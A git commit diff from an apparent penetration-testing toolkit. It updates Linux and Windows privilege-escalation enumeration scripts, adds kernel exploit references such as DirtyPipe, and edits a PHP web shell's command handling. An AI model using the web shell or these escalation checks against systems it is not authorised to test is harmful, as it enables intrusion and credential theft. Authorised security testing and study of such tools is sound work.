Project Update

This commit is contained in:
Roman Hergenreder 2022-12-05 10:09:01 +01:00
parent a86fff1b36
commit 80abe85b85
11 changed files with 2722 additions and 1573 deletions

@ -79,14 +79,15 @@ class Crawler:
self.queue.put(parts._replace(netloc=self.domain, scheme=self.scheme,fragment="").geturl())
def collect_urls(self, page):
soup = BeautifulSoup(page, "html.parser")
if not isinstance(page, BeautifulSoup):
page = BeautifulSoup(page, "html.parser")
urls = set()
attrs = ["src","href","action"]
tags = ["a","link","script","img","form"]
for tag in tags:
for e in soup.find_all(tag):
for e in page.find_all(tag):
for attr in attrs:
if e.has_attr(attr):
urls.add(e[attr])

3428
linpeas.sh

File diff suppressed because one or more lines are too long

@ -1,7 +1,7 @@
#!/bin/bash
#
# Copyright (c) 2016-2020, @_mzet_
# Copyright (c) 2016-2022, @_mzet_
#
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it
@ -930,6 +930,44 @@ author: theflow (orginal exploit author); bcoles (author of exploit update at 'e
EOF
)
EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2022-0847]${txtrst} DirtyPipe
Reqs: pkg=linux-kernel,ver>=5.8,ver<=5.16.11
Tags: ubuntu=(20.04|21.04),debian=11
Rank: 1
analysis-url: https://dirtypipe.cm4all.com/
src-url: https://haxx.in/files/dirtypipez.c
exploit-db: 50808
author: blasty (original exploit author: Max Kellermann)
EOF
)
EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2022-2586]${txtrst} nft_object UAF
Reqs: pkg=linux-kernel,ver>=3.16,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=(20.04){kernel:5.12.13}
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2022/08/29/5
src-url: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
author: vulnerability discovery: Team Orca of Sea Security; Exploit author: Alejandro Guerrero
EOF
)
EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2022-32250]${txtrst} nft_object UAF (NFT_MSG_NEWSET)
Reqs: pkg=linux-kernel,ver<5.18.1,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Rank: 1
analysis-url: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
analysis-url: https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
src-url: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
author: vulnerability discovery: EDG Team from NCC Group; Author of this exploit: theori.io
EOF
)
############ USERSPACE EXPLOITS ###########################
n=0
@ -1769,7 +1807,7 @@ EOF
FEATURES[((n++))]=$(cat <<EOF
feature: Syscalls filtering
available: CONFIG_SECCOMP=y
enabled: cmd:grep -i Seccomp /proc/self/status | awk '{print \$2}'
enabled: cmd:grep -iw Seccomp /proc/self/status | awk '{print \$2}'
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bpf_syscall.md
EOF
)
@ -2168,7 +2206,7 @@ for FEATURE in "${FEATURES[@]}"; do
feature=$(echo "$FEATURE" | grep "feature: " | cut -d' ' -f 2-)
if [ -n "$cmdStdout" ]; then
if [ "$cmdStdout" -eq 0 ]; then
if [ $cmdStdout -eq 0 ]; then
state="[ ${txtred}Set to $cmdStdout${txtrst} ]"
cmdStdout=""
else
@ -2189,7 +2227,7 @@ for FEATURE in "${FEATURES[@]}"; do
enabled="[ ${txtred}Exposed${txtrst} ]"
disabled="[ ${txtgrn}Locked${txtrst} ]"
#other modes" "Disabled" / "Enabled"
# other modes" "Disabled" / "Enabled"
else
enabled="[ ${txtgrn}Enabled${txtrst} ]"
disabled="[ ${txtred}Disabled${txtrst} ]"

287
lse.sh

@ -1,15 +1,15 @@
#!/bin/sh
# shellcheck disable=1003,1091,2006,2016,2034,2039
# vim: set ts=2 sw=2 sts=2 et:
# shellcheck disable=1003,1091,2006,2016,2034,2039,3043
# vim: set ts=2 sw=2 sts=2 fdm=marker fmr=#(,#) et:
# Author: Diego Blanco <diego.blanco@treitos.com>
# GitHub: https://github.com/diego-treitos/linux-smart-enumeration
#
lse_version="3.10"
lse_version="4.10nw"
#( Colors
##( Colors
#
# fg
#( fg
red='\e[31m'
lred='\e[91m'
green='\e[32m'
@ -26,8 +26,8 @@ grey='\e[90m'
lgrey='\e[37m'
white='\e[97m'
black='\e[30m'
#
# bg
##)
#( bg
b_red='\e[41m'
b_lred='\e[101m'
b_green='\e[42m'
@ -44,8 +44,8 @@ b_grey='\e[100m'
b_lgrey='\e[47m'
b_white='\e[107m'
b_black='\e[40m'
#
# special
##)
#( special
reset='\e[0;0m'
bold='\e[01m'
italic='\e[03m'
@ -59,13 +59,13 @@ underline_off='\e[24m'
inverse_off='\e[27m'
conceil_off='\e[28m'
crossedout_off='\e[29m'
##)
#)
#( Globals
##( Globals
#
# user
lse_user_id="$UID"
[ -z "$lse_user_id" ] && lse_user_id="`id -u`"
lse_user_id="`id -u`"
lse_user="$USER"
[ -z "$lse_user" ] && lse_user="`id -nu`"
lse_pass=""
@ -77,7 +77,8 @@ lse_arch="`uname -m`"
lse_linux="`uname -r`"
lse_hostname="`hostname`"
lse_distro=`command -v lsb_release >/dev/null 2>&1 && lsb_release -d | sed 's/Description:\s*//' 2>/dev/null`
[ -z "$lse_distro" ] && lse_distro="`(source /etc/os-release && echo "$PRETTY_NAME")2>/dev/null`"
[ -z "$lse_distro" ] && lse_distro="`(. /etc/os-release && echo "$PRETTY_NAME")2>/dev/null`"
lse_distro_codename="" # retrieved below with lse_get_distro_codename
# lse
lse_passed_tests=""
@ -85,11 +86,12 @@ lse_executed_tests=""
lse_DEBUG=false
lse_procmon_data=`mktemp`
lse_procmon_lock=`mktemp`
lse_cve_tmp=''
# printf
printf "%s" "$reset" | grep -q '\\' && alias printf="env printf"
# internal data
#( internal data
lse_common_setuid="
/bin/fusermount
/bin/mount
@ -176,12 +178,14 @@ lse_common_setuid="
/usr/sbin/usernetctl
/usr/sbin/uuidd
"
#regex rules for common setuid
#)
#( regex rules for common setuid
lse_common_setuid="$lse_common_setuid
/snap/core.*
/var/tmp/mkinitramfs.*
"
#critical writable files
#)
#( critical writable files
lse_critical_writable="
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
@ -235,8 +239,13 @@ lse_critical_writable_dirs="
/root
"
#)
#( CVE list (populated by the lse packager)
lse_cve_list="
" #CVElistMARKER
#)
#)
#( Options
##( Options
lse_color=true
lse_alt_color=false
lse_interactive=true
@ -247,16 +256,16 @@ lse_find_opts='-path /proc -prune -o -path /sys -prune -o -path /dev -prune -o'
lse_grep_opts='--color=always'
#)
#( Lib
cecho() {
##( Lib
cecho() { #(
if $lse_color; then
printf "%b" "$@"
else
# If color is disabled we remove it
printf "%b" "$@" | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g'
fi
}
lse_recolor() {
} #)
lse_recolor() { #(
o_white="$white"
o_lyellow="$lyellow"
o_grey="$grey"
@ -270,11 +279,11 @@ lse_recolor() {
lred="$red"
lgreen="$b_lgreen$black"
lcyan="$cyan"
}
lse_error() {
} #)
lse_error() { #(
cecho "${red}ERROR: ${reset}$*\n" >&2
}
lse_exclude_paths() {
} #)
lse_exclude_paths() { #(
local IFS="
"
for p in `printf "%s" "$1" | tr ',' '\n'`; do
@ -282,8 +291,8 @@ lse_exclude_paths() {
p="${p%%/}"
lse_find_opts="$lse_find_opts -path ${p} -prune -o"
done
}
lse_set_level() {
} #)
lse_set_level() { #(
case "$1" in
0|1|2)
lse_level=$(($1))
@ -293,8 +302,8 @@ lse_set_level() {
exit 1
;;
esac
}
lse_help() {
} #)
lse_help() { #(
echo "Use: $0 [options]"
echo
echo " OPTIONS"
@ -319,6 +328,7 @@ lse_help() {
echo " pro: Processes related tests."
echo " sof: Software related tests."
echo " ctn: Container (docker, lxc) related tests."
echo " cve: CVE related tests."
echo " Specific tests can be used with their IDs (i.e.: usr020,sud)"
echo " -e PATHS Comma separated list of paths to exclude. This allows you"
echo " to do faster scans at the cost of completeness"
@ -326,8 +336,8 @@ lse_help() {
echo " processes. A value of 0 will disable any watch (default: 60)"
echo " -S Serve the lse.sh script in this host so it can be retrieved"
echo " from a remote host."
}
lse_ask() {
} #)
lse_ask() { #(
local question="$1"
# We use stderr to print the question
cecho "${white}${question}: ${reset}" >&2
@ -341,24 +351,24 @@ lse_ask() {
return 1
;;
esac
}
lse_request_information() {
} #)
lse_request_information() { #(
if $lse_interactive; then
cecho "${grey}---\n"
[ -z "$lse_user" ] && lse_user=`lse_ask "Could not find current user name. Current user?"`
lse_pass=`lse_ask "If you know the current user password, write it here to check sudo privileges"`
cecho "${grey}---\n"
fi
}
lse_test_passed() {
} #)
lse_test_passed() { #(
# Checks if a test passed by ID
local id="$1"
for i in $lse_passed_tests; do
[ "$i" = "$id" ] && return 0
done
return 1
}
lse_test() {
} #)
lse_test() { #(
# Test id
local id="$1"
# Minimum level required for this test to show its output
@ -394,8 +404,8 @@ lse_test() {
# Print name and line
cecho "${white}[${l}${white}] ${grey}${id}${white} $name${grey}"
for i in $(seq $((${#name}+4)) 67); do
echo -n "."
for i in $(seq $((${#id}+${#name}+10)) 79); do
printf "."
done
# Check dependencies
@ -445,8 +455,8 @@ lse_test() {
fi
return 0
fi
}
lse_show_info() {
} #)
lse_show_info() { #(
echo
cecho "${lcyan} LSE Version:${reset} $lse_version\n"
echo
@ -470,12 +480,14 @@ lse_show_info() {
fi
cecho "${lblue}Architecture:${reset} $lse_arch\n"
echo
}
lse_serve() {
cecho "${green}=====================(${yellow} Current Output Verbosity Level: ${cyan}$lse_level ${green})======================${reset}"
echo
} #)
lse_serve() { #(
# get port
which nc >/dev/null || lse_error "Could not find 'nc' netcat binary."
local_ips="`ip a | grep -Eo 'inet ([0-9]{1,3}\.){3}[0-9]{1,3}' | cut -d' ' -f2`"
local_ips="`ip a | grep -Eo "inet ([0-9]{1,3}\.){3}[0-9]{1,3}" | cut -d' ' -f2`"
# Get a valid and non used port
port=`od -An -N2 -i /dev/random|grep -Eo '[0-9]+'`
@ -506,8 +518,8 @@ lse_serve() {
done
# try nc with '-N' (openbsd), then ncat and then use '-q0' (traditional)
nc -l -N -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l --send-only -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l -q0 -p "$port" < "$0" >/dev/null
}
lse_header() {
} #)
lse_header() { #(
local id="$1"
shift
local title="$*"
@ -530,8 +542,8 @@ lse_header() {
done
text="$text(${green} $title ${magenta})====="
cecho "$text${reset}\n"
}
lse_exit() {
} #)
lse_exit() { #(
local ec=1
local text="\n${magenta}=================================="
[ "$1" ] && ec=$1
@ -539,18 +551,32 @@ lse_exit() {
cecho "$text${reset}\n"
rm -f "$lse_procmon_data"
rm -f "$lse_procmon_lock"
rm -f "$lse_cve_tmp"
exit "$ec"
}
lse_procmon() {
} #)
lse_procmon() { #(
# monitor processes
#NOTE: The first number will be the number of occurrences of a process due to
# uniq -c
local ps_args
local ps_busybox
if ps -V 2>&1 | grep -iq busybox; then
ps_args='-o pid,user,args'
ps_busybox=true
else
ps_args="-ewwwo start_time,pid,user:50,args"
ps_busybox=false
fi
while [ -f "$lse_procmon_lock" ]; do
ps -ewwwo start_time,pid,user:50,args
if $ps_busybox; then
ps $ps_args | sed 's/^\([0-9]*\)/? \1 /g'
else
ps $ps_args
fi
sleep 0.001
done | grep -v 'ewwwo start_time,pid,user:50,args' | sed 's/^ *//g' | tr -s '[:space:]' | grep -v "^START" | grep -Ev '[^ ]+ [^ ]+ [^ ]+ \[' | sort -Mr | uniq -c | sed 's/^ *//g' > "$lse_procmon_data"
}
lse_proc_print() {
done | grep -Ev "(pid,user|$lse_user *sed s/)" | sed 's/^ *//g' | tr -s '[:space:]' | grep -Ev "PID *USER *COMMAND" | grep -Ev '[^ ]+ [^ ]+ [^ ]+ \[' | sort -Mr | uniq -c | sed 's/^ *//g' > "$lse_procmon_data"
} #)
lse_proc_print() { #(
# Pretty prints output from lse_procmom received via stdin
if $lse_color; then
printf "${green}%s %8s %8s %s\n" "START" "PID" "USER" "COMMAND"
@ -574,7 +600,57 @@ lse_proc_print() {
printf "%s %8s %8s %s\n" "$p_time" "$p_pid" "$p_user" "$p_args"
fi
done
}
} #)
lse_get_distro_codename() { #(
# Get the distribution name
#
# ubuntu, debian, centos, redhat, opsuse, fedora, rocky
local distro="${grey}unknown${reset}"
if type lsb_release >/dev/null 2>&1; then
distro=`lsb_release -is`
elif [ -f /etc/os-release ]; then
distro=`grep -E '^ID=' /etc/os-release | cut -f2 -d=`
echo "$distro" | grep -qi opensuse && distro=opsuse
elif [ -f /etc/redhat-release ]; then
grep -qi "centos" /etc/redhat-release && distro=centos
grep -qi "fedora" /etc/redhat-release && distro=fedora
grep -qi "red hat" /etc/redhat-release && distro=redhat
grep -qi "rocky" /etc/redhat-release && distro=rocky
fi
printf '%s' "$distro" | tr '[:upper:]' '[:lower:]' | tr -d \"\'
} #)
lse_is_version_bigger() { #(
# check if version v1 is bigger than v2
local v1="$1"; local v2="$2" ; local vc
[ "$v1" = "$v2" ] && return 1 # equal is not bigger
vc="`printf "%s\n%s\n" "$v1" "$v2" | sort -rV | head -n1`"
[ "$v1" = "$vc" ] && return 0
return 1
} #)
lse_get_pkg_version() { #(
# get package version depending on distro
# returns 2 if distro is unknown
# returns 1 if package is not installed (or doesn't exist)
# returns 0 on success, and prints out the package version
pkg_name="$1"
case "$lse_distro_codename" in
debian|ubuntu)
pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^ii' | tr -s ' ' | cut -d' ' -f3`
;;
centos|redhat|fedora|opsuse|rocky|amzn)
pkg_version=`rpm -q "$pkg_name" 2>/dev/null`
pkg_version="${pkg_version##"$pkg_name"-}"
pkg_version=`echo "$pkg_version" | sed -E 's/\.(aarch64|armv7hl|i686|noarch|ppc64le|s390x|x86_64)$//'`
;;
*)
return 2
;;
esac
[ -z "$pkg_version" ] && return 1
printf "%s" "$pkg_version"
return 0
} #)
#)
#)
########################################################################( TESTS
@ -638,7 +714,7 @@ lse_run_tests_users() {
'for ep in $lse_exec_paths; do [ "$ep" = "." ] && grep -ER "^ *PATH=.*" /etc/ 2> /dev/null | tr -d \"\'"'"' | grep -E "[=:]\.([:[:space:]]|\$)";done' \
"usr070"
}
#)
#########################################################################( sudo
lse_run_tests_sudo() {
@ -688,7 +764,7 @@ lse_run_tests_sudo() {
"Do we know if any other users used sudo?" \
'for uh in $(cut -d: -f1,6 /etc/passwd); do [ -f "${uh##*:}/.sudo_as_admin_successful" ] && echo "${uh%%:*}"; done'
}
#)
##################################################################( file system
lse_run_tests_filesystem() {
@ -851,7 +927,7 @@ lse_run_tests_filesystem() {
"Dump fstab file" \
'cat /etc/fstab'
}
#)
#######################################################################( system
lse_run_tests_system() {
@ -907,7 +983,7 @@ lse_run_tests_system() {
"System password policies in /etc/login.defs" \
'grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs'
}
#)
#####################################################################( security
lse_run_tests_security() {
@ -953,7 +1029,7 @@ lse_run_tests_security() {
"Can we read the auditd log?" \
'al=/var/log/audit/audit.log; test -r "$al" && echo "tail $al:" && echo && tail "$al"'
}
#)
##############################################################( recurrent tasks
lse_run_tests_recurrent_tasks() {
@ -1021,7 +1097,7 @@ lse_run_tests_recurrent_tasks() {
"Systemd timers" \
'systemctl list-timers --all'
}
#)
######################################################################( network
lse_run_tests_network() {
@ -1072,7 +1148,7 @@ lse_run_tests_network() {
"Listening UDP" \
'netstat -unlp || ss -unlp'
}
#)
#####################################################################( services
lse_run_tests_services() {
@ -1167,7 +1243,7 @@ lse_run_tests_services() {
"Systemd config files permissions" \
'ls -lthR /lib/systemd/ /etc/systemd/'
}
#)
#####################################################################( software
lse_run_tests_software() {
@ -1310,7 +1386,7 @@ lse_run_tests_software() {
'screen -v'
}
#)
###################################################################( containers
lse_run_tests_containers() {
@ -1341,7 +1417,7 @@ lse_run_tests_containers() {
"Is the user a member of any lxc/lxd group?" \
'groups | grep $lse_grep_opts "lxc\|lxd"'
}
#)
####################################################################( processes
lse_run_tests_processes() {
@ -1398,11 +1474,35 @@ lse_run_tests_processes() {
'printf "%s\n" "$lse_proc_bin" | xargs ls -l' \
"pro001"
}
#)
#########################################################################( CVEs
lse_run_tests_cves() {
lse_header "cve" "CVEs"
if [ "${#lse_cve_list}" = 1 ]; then
if [ -z "$lse_selection" ] || printf "%s" "$lse_selection" | grep -iq 'cve'; then
printf "%s\n%s\n%s" \
" In order to test for CVEs, download lse.sh from the GitHub releases page." \
" Alternatively, build lse_cve.sh using tools/package_cvs_into_lse.sh from the" \
" repository."
fi
else
for lse_cve in $lse_cve_list; do
eval "$(printf '%s' "$lse_cve" | base64 -d | gunzip -c)"
lse_test "$lse_cve_id" "$lse_cve_level" \
"$lse_cve_description" \
"lse_cve_test"
done
fi
}
#)
#
##)
#( Main
while getopts "hcCil:e:p:s:S" option; do
main() {
while getopts "hcCil:e:p:s:S" option; do
case "${option}" in
c) lse_color=false; lse_grep_opts='--color=never';;
C) lse_alt_color=true;;
@ -1415,32 +1515,43 @@ while getopts "hcCil:e:p:s:S" option; do
h) lse_help; exit 0;;
*) lse_help; exit 1;;
esac
done
done
#trap to exec on SIGINT
trap "lse_exit 1" 2
#trap to exec on SIGINT
trap "lse_exit 1" 2
# use alternative color scheme
$lse_alt_color && lse_recolor
# use alternative color scheme
$lse_alt_color && lse_recolor
lse_request_information
lse_show_info
PATH="$PATH:/sbin:/usr/sbin" #fix path just in case
lse_request_information
lse_show_info
PATH="$PATH:/sbin:/usr/sbin" #fix path just in case
lse_distro_codename=`lse_get_distro_codename`
lse_procmon &
(sleep "$lse_proc_time"; rm -f "$lse_procmon_lock") &
lse_procmon &
(sleep "$lse_proc_time"; rm -f "$lse_procmon_lock") &
lse_run_tests_users
lse_run_tests_sudo
lse_run_tests_filesystem
lse_run_tests_system
lse_run_tests_security
lse_run_tests_recurrent_tasks
lse_run_tests_network
lse_run_tests_services
lse_run_tests_software
lse_run_tests_containers
lse_run_tests_processes
## NO WAR
lse_header "nowar" "humanity"
lse_test "nowar0" "0" \
'Should we question autocrats and their "military operations"?' \
'cecho " $black$b_blue NO $reset\n $black$b_yellow WAR $reset"'
lse_exit 0
lse_run_tests_users
lse_run_tests_sudo
lse_run_tests_filesystem
lse_run_tests_system
lse_run_tests_security
lse_run_tests_recurrent_tasks
lse_run_tests_network
lse_run_tests_services
lse_run_tests_software
lse_run_tests_containers
lse_run_tests_processes
lse_run_tests_cves
lse_exit 0
}
[ ! "$lse_NO_EXEC" ] && main "$@"
#)

@ -1,14 +1,22 @@
<?php
function expandPath($path) {
if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) {
exec("echo $match[1]", $stdout);
return $stdout[0] . $match[2];
}
return $path;
}
function featureShell($cmd, $cwd) {
$stdout = array();
if (preg_match("/^\s*cd\s*$/", $cmd)) {
// pass
if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) {
chdir(expandPath("~"));
} elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) {
chdir($cwd);
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
chdir($match[1]);
chdir(expandPath($match[1]));
} elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) {
chdir($cwd);
preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);

@ -8,6 +8,7 @@ import requests
import urllib.parse
import util
from bs4 import BeautifulSoup
from crawl_urls import Crawler
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
@ -208,7 +209,7 @@ class WebServiceFinder:
litecart_pattern = re.compile(r"^https://www.litecart.net")
wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|style.min.css)\?ver=([0-9.]+)(&|$)")
urls = util.collectUrls(soup)
urls = Crawler(self.url).collect_urls(soup)
for url in urls:
self.printMatch("Moodle", moodle_pattern_1.search(url), version_func=lambda v: self.retrieveMoodleVersion(int(v)))
self.printMatch("Moodle", moodle_pattern_2.search(url), version_func=lambda v: "%d.%d" % (int(v)//10,int(v)%10))

Binary file not shown.

Binary file not shown.

@ -55,7 +55,7 @@ ECHO.
CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
ECHO. [i] Check for vulnerabilities for the OS version with the applied patches
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
systeminfo
ECHO.
CALL :T_Progress 2
@ -174,7 +174,7 @@ CALL :T_Progress 1
:UACSettings
CALL :ColorLine " %E%33m[+]%E%97m UAC Settings"
ECHO. [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul
ECHO.
CALL :T_Progress 1
@ -225,7 +225,7 @@ CALL :T_Progress 1
:InstalledSoftware
CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE"
ECHO. [i] Some weird software? Check for vulnerabilities in unknow software installed
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software
ECHO.
dir /b "C:\Program Files" "C:\Program Files (x86)" | sort
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\"
@ -236,7 +236,7 @@ CALL :T_Progress 2
:RemodeDeskCredMgr
CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#remote-desktop-credential-manager
IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
ECHO.
CALL :T_Progress 1
@ -244,7 +244,7 @@ CALL :T_Progress 1
:WSUS
CALL :ColorLine " %E%33m[+]%E%97m WSUS"
ECHO. [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://"
ECHO.
CALL :T_Progress 1
@ -252,7 +252,7 @@ CALL :T_Progress 1
:RunningProcesses
CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES"
ECHO. [i] Something unexpected is running? Check for vulnerabilities
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes
tasklist /SVC
ECHO.
CALL :T_Progress 2
@ -273,7 +273,7 @@ CALL :T_Progress 3
:RunAtStartup
CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP"
ECHO. [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#run-at-startup
::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^
@ -297,7 +297,7 @@ CALL :T_Progress 2
:AlwaysInstallElevated
CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?"
ECHO. [i] If '1' then you can install a .msi file with admin privileges ;)
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
ECHO.
@ -361,7 +361,7 @@ CALL :T_Progress 1
:BasicUserInfo
CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO
ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups
ECHO.
CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER"
net user %username%
@ -435,7 +435,7 @@ ECHO.
:ServiceBinaryPermissions
CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do (
for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO.
)
@ -444,7 +444,7 @@ CALL :T_Progress 1
:CheckRegistryModificationAbilities
CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a
ECHO.
CALL :T_Progress 1
@ -453,7 +453,7 @@ CALL :T_Progress 1
CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS"
ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
ECHO. [i] The permissions are also checked and filtered using icacls
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO.
@ -468,7 +468,7 @@ ECHO.
CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable"
ECHO. [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
ECHO. [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. )
ECHO.
CALL :T_Progress 1
@ -477,7 +477,7 @@ CALL :T_Progress 1
CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS"
ECHO.
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#windows-vault
cmdkey /list
ECHO.
CALL :T_Progress 2
@ -485,14 +485,14 @@ CALL :T_Progress 2
:DPAPIMasterKeys
